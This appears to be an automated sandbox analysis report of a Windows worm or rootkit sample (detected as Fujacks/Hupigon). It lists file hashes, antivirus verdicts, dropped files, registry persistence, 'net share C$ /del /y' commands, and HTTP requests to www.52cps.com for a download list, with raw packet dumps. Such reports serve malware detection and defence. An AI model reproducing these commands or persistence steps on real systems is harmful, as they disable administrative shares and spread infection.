Analysis Date2015-04-06 20:38:49
MD50b07d815ca7ebaa9f9f82a1c92489e40
SHA174e85ca8c4b44f0fcfac0183b431f9f2f4d15ed8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.nsp0 md5: a41250b4f23aa95ace25fe3ee3761eb6 sha1: a12026ec59c031e8dca8148cb36a67c477230507 size: 356352
Section.nsp1 md5: 831d5b0b0be5df127eddcb9e48a64b4e sha1: 37725da02852528e37e904902ab8c7e59de98a45 size: 77824
Section.nsp2 md5: 510dbd15460ab5899b530fa6e252f773 sha1: 34d54bed32add78d8c42ca32a2100f5dfc6e2b9c size: 12800
Timestamp1992-06-19 22:22:17
PackerBorland Delphi v6.0 - v7.0
PEhash719160e1ba17009dc2542a11cfcfa10783265940
IMPhash31e401b3ab62da1771413f32fd30dabd
AV360 Safeno_virus
AVAd-AwareBackdoor.Hupigon.AYGZ
AVAlwil (avast)Rootkit-gen [Rtk]:Imponex [Wrm]
AVArcabit (arcavir)Backdoor.Hupigon.AYGZ:Rootkit.Agent.AIZZ
AVAuthentiumW32/Rootkit.LIUE-0684
AVAvira (antivir)Rkit/Small.AN
AVBullGuardBackdoor.Hupigon.AYGZ
AVCA (E-Trust Ino)Win32/Tnega.ORVAbRB
AVCAT (quickheal)no_virus
AVClamAVWin.Trojan.Rootkit-4869
AVDr. WebWin32.HLLP.Whboy.104
AVEmsisoftBackdoor.Hupigon.AYGZ
AVEset (nod32)Win32/Fujacks virus
AVFortinetW32/Fujacks.AW
AVFrisk (f-prot)W32/Rootkit.CKZ
AVF-SecureBackdoor.Hupigon.AYGZ
AVGrisoft (avg)PSW.Generic8.BBX.dropper
AVIkarusRootkit.Win32.Small
AVK7Trojan ( 003bc76d1 )
AVKaspersky 2015Trojan.Win32.Generic:Worm.Win32.Generic:Worm.Win32.AutoRun.dvw
AVMalwareBytesPacked.NSPack
AVMcafeeW32/Fujacks.gen.a
AVMicrosoft Security EssentialsWorm:Win32/Emerleox.gen!A
AVMicroWorld (escan)Backdoor.Hupigon.AYGZ
AVRisingWin32.BMW.q
AVSophosW32/Fujacks-BJ
AVSymantecSuspicious.DLoader
AVTrend Microno_virus
AVVirusBlokAda (vba32)BScope.Rootkit.Gamepass.01309

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\system32\drivers\TXPlatform.exe
Creates ProcessC:\WINDOWS\system32\drivers\TXPlatform.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del97$$.bat

Process
↳ cmd.exe /c net share C$ /del /y

Creates Processnet share C$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del13$$.bat

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Processnet share admin$ /del /y

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex_SHuassist.mtx
Creates MutexShell.CMruPidlList

Process
↳ cmd.exe /c net share C$ /del /y

Creates Processnet share C$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del99$$.bat

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex_SHuassist.mtx
Creates MutexShell.CMruPidlList

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B45FF030-4447-11D2-85DE-00C04FA35C89}\iexplore\Type ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝
4
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex_SHuassist.mtx
Creates MutexShell.CMruPidlList
Winsock DNSwww.52cps.com

Process
↳ cmd.exe /c net share E$ /del /y

Creates Processnet share E$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del31$$.bat

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Processnet share admin$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del10$$.bat

Process
↳ cmd.exe /c net share E$ /del /y

Creates Processnet share E$ /del /y

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B45FF030-4447-11D2-85DE-00C04FA35C89}\iexplore\Type ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝
4
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex_SHuassist.mtx
Creates MutexShell.CMruPidlList
Winsock DNSwww.52cps.com

Process
↳ C:\WINDOWS\system32\drivers\TXPlatform.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer ➝
C:\WINDOWS\system32\drivers\TXPlatform.exe\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CLASSES_ROOT\HTTP\shell\open\command\ ➝
"C:\Program Files\InternetExplorer\iexplore.exe" -nohome
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun ➝
128
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\myUPdatetxt.txt
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\CMap\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\37$$.Ico
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\LanguageNames\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del31$$.bat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Desktop_1.ini
Creates FileC:\temp\run\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\Desktop_1.ini
Creates FileC:\autorun.inf
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\65$$.Ico
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\Desktop_1.ini
Creates FileC:\autorun.inf
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Font\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins3d\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Optional\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\en_US\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Desktop_1.ini
Creates FileC:\RECYCLER\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\Desktop_1.ini
Creates FileC:\RECYCLER\Desktop_1.ini
Creates FileC:\Program Files\xerox\nwwia\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del97$$.bat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\SPPlugins\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\ENU\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del56$$.bat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\images\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Font\PFM\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Images\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\MPP\Desktop_1.ini
Creates FileC:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Browser\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Templates\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Desktop_1.ini
Creates FileC:\Program Files\xerox\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\ENU\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del13$$.bat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del10$$.bat
Creates FilePIPE\wkssvc
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates FileC:\Program Files\Adobe\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\Desktop_1.ini
Creates FileC:\Program Files\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\en_US\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Proximity\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\Desktop_1.ini
Creates FileC:\Program Files\Online Services\Desktop_1.ini
Creates FileC:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\99$$.Ico
Creates Filec:\QQ.sys
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\ENU\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\PMP\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Javascripts\Desktop_1.ini
Creates FileC:\Program Files\Uninstall Information\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Esl\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\WebSearch\Desktop_1.ini
Creates FileC:\temp\logs\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del99$$.bat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\ENU\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\ENU\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\87$$.Ico
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\Desktop_1.ini
Creates FileC:\temp\Desktop_1.ini
Creates FileC:\Program Files\MSN Gaming Zone\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\26$$.Ico
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\41$$.Ico
Deletes Filec:\QQ.sys
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\87$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\65$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\99$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\26$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\37$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\41$$.Ico
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del99$$.bat
Creates Processcmd.exe /c net share E$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del31$$.bat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del97$$.bat
Creates Processcmd.exe /c net share admin$ /del /y
Creates Processcmd.exe /c net share admin$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del10$$.bat
Creates Processcmd.exe /c net share E$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n
Creates Processcmd.exe /c net share C$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del13$$.bat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del56$$.bat
Creates Processcmd.exe /c net share C$ /del /y
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates ServiceRESSDT - c:\QQ.sys
Winsock URL<html>\\n <head>\\n <title>404 Not Found</title>\\n </head>\\n <body>\\n <h1>Not Found</h1>\\n <p>Your browser sent a request that this server could not understand.</p>\\n <p>No such file or directory.</p>\\n <hr />\\n <address>Microsoft-IIS/7.0</address>\\n </body>\\n</html>\\n
Winsock URLhttp://www.52CPS.COM/goto/down.txt

Process
↳ net share C$ /del /y

Creates Processnet1 share C$ /del /y

Process
↳ net share admin$ /del /y

Creates Processnet1 share admin$ /del /y

Process
↳ net share C$ /del /y

Process
↳ net share E$ /del /y

Creates Processnet1 share E$ /del /y

Process
↳ net share admin$ /del /y

Creates Processnet1 share admin$ /del /y

Process
↳ net share E$ /del /y

Creates Processnet1 share E$ /del /y

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 800

Process
↳ Pid 844

Process
↳ C:\WINDOWS\System32\svchost.exe

Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00

Process
↳ Pid 1860

Process
↳ Pid 1140

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del56$$.bat

Process
↳ net1 share C$ /del /y

Creates FilePIPE\srvsvc

Process
↳ net1 share admin$ /del /y

Creates FilePIPE\srvsvc

Process
↳ net1 share E$ /del /y

Process
↳ net1 share admin$ /del /y

Creates FilePIPE\srvsvc

Process
↳ net1 share E$ /del /y

Creates FilePIPE\srvsvc

Network Details:

DNSwww.52cps.com
Type: A
141.8.225.80
HTTP GEThttp://www.52CPS.COM/goto/down.txt
User-Agent: ErrCode
HTTP GEThttp://www.52cps.com/TJ.Htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.52CPS.COM/goto/down.txt
User-Agent: ErrCode
HTTP GEThttp://www.52cps.com/TJ.Htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1042 ➝ 10.1.2.1:139
Flows TCP192.168.1.1:1043 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1045 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1046 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1047 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1048 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1049 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1050 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1051 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1062 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1063 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1064 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1065 ➝ 10.1.2.1:445
Flows TCP192.168.1.1:1066 ➝ 10.1.2.1:445

Raw Pcap
0x00000000 (00000)   47455420 2f676f74 6f2f646f 776e2e74   GET /goto/down.t
0x00000010 (00016)   78742048 5454502f 312e310d 0a557365   xt HTTP/1.1..Use
0x00000020 (00032)   722d4167 656e743a 20457272 436f6465   r-Agent: ErrCode
0x00000030 (00048)   0d0a486f 73743a20 7777772e 35324350   ..Host: www.52CP
0x00000040 (00064)   532e434f 4d0d0a43 61636865 2d436f6e   S.COM..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a                                  ..

0x00000000 (00000)   47455420 2f544a2e 48746d20 48545450   GET /TJ.Htm HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a41 63636570 742d4c61 6e677561   *..Accept-Langua
0x00000030 (00048)   67653a20 656e2d75 730d0a41 63636570   ge: en-us..Accep
0x00000040 (00064)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000050 (00080)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x000000a0 (00160)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000b0 (00176)   37290d0a 486f7374 3a207777 772e3532   7)..Host: www.52
0x000000c0 (00192)   6370732e 636f6d0d 0a436f6e 6e656374   cps.com..Connect
0x000000d0 (00208)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000e0 (00224)   0a0d0a20 203c703e 596f7572 2062726f   ...  <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f676f74 6f2f646f 776e2e74   GET /goto/down.t
0x00000010 (00016)   78742048 5454502f 312e310d 0a557365   xt HTTP/1.1..Use
0x00000020 (00032)   722d4167 656e743a 20457272 436f6465   r-Agent: ErrCode
0x00000030 (00048)   0d0a486f 73743a20 7777772e 35324350   ..Host: www.52CP
0x00000040 (00064)   532e434f 4d0d0a43 61636865 2d436f6e   S.COM..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a656e 743a204d 6f7a696c 6c612f34   ..ent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x000000a0 (00160)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000b0 (00176)   37290d0a 486f7374 3a207777 772e3532   7)..Host: www.52
0x000000c0 (00192)   6370732e 636f6d0d 0a436f6e 6e656374   cps.com..Connect
0x000000d0 (00208)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000e0 (00224)   0a0d0a20 203c703e 596f7572 2062726f   ...  <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f544a2e 48746d20 48545450   GET /TJ.Htm HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a41 63636570 742d4c61 6e677561   *..Accept-Langua
0x00000030 (00048)   67653a20 656e2d75 730d0a41 63636570   ge: en-us..Accep
0x00000040 (00064)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000050 (00080)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x000000a0 (00160)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000b0 (00176)   37290d0a 486f7374 3a207777 772e3532   7)..Host: www.52
0x000000c0 (00192)   6370732e 636f6d0d 0a436f6e 6e656374   cps.com..Connect
0x000000d0 (00208)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000e0 (00224)   0a0d0a20 203c703e 596f7572 2062726f   ...  <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
